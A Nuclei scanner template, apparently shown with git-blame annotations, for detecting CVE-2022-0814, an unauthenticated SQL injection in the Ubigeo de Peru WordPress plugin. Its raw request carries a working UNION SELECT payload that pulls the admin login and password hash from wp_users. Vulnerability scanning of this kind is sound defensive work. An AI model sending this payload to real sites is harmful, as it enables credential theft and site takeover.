nuclei-templates/http/cves/2022/CVE-2022-0814.yaml

id: CVE-2022-0814

info:
  name: Ubigeo de Peru < 3.6.4 - SQL Injection
  author: r3Y3r53
  severity: critical
  description: |
    The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
  remediation: Fixed in version 3.6.4
  reference:
    - https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
    - https://wordpress.org/plugins/ubigeo-peru/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0814
    cwe-id: CWE-89
    epss-score: 0.05057
    epss-percentile: 0.92125
    cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ubigeo_de_peru_para_woocommerce_project
    product: ubigeo_de_peru_para_woocommerce
    framework: wordpress
    publicwww-query: "/wp-content/plugins/ubigeo-peru/"
  tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'idProv'
          - 'idDist'
          - 'distrito'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402207f94ae56f0991e1313cf35938d23142d38dc98041de514ff792f7afccb414b4102205bb7a999bcca2049c0439eeb971a42e7e59d499364f3d2a902ca48234b407304:922c64590222798bb761d5b6d8e72950
fixed errors 2023-10-17 08:16:05 +00:00			`id: CVE-2022-0814`
templates added 2023-10-17 07:20:28 +00:00
			`info:`
			`name: Ubigeo de Peru < 3.6.4 - SQL Injection`
			`author: r3Y3r53`
			`severity: critical`
			`description: \|`
			`The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`remediation: Fixed in version 3.6.4`
fixed errors 2023-10-17 08:16:05 +00:00			`reference:`
templates added 2023-10-17 07:20:28 +00:00			`- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814`
			`- https://wordpress.org/plugins/ubigeo-peru/`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-0814`
			`cwe-id: CWE-89`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.05057`
			`epss-percentile: 0.92125`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce::::::wordpress::*`
templates added 2023-10-17 07:20:28 +00:00			`metadata:`
			`verified: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`max-request: 1`
			`vendor: ubigeo_de_peru_para_woocommerce_project`
			`product: ubigeo_de_peru_para_woocommerce`
			`framework: wordpress`
templates added 2023-10-17 07:20:28 +00:00			`publicwww-query: "/wp-content/plugins/ubigeo-peru/"`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project`
templates added 2023-10-17 07:20:28 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- 'idProv'`
			`- 'idDist'`
			`- 'distrito'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sun Jan 14 14:05:19 UTC 2024] :robot: 2024-01-14 14:05:19 +00:00			`# digest: 490a0046304402207f94ae56f0991e1313cf35938d23142d38dc98041de514ff792f7afccb414b4102205bb7a999bcca2049c0439eeb971a42e7e59d499364f3d2a902ca48234b407304:922c64590222798bb761d5b6d8e72950`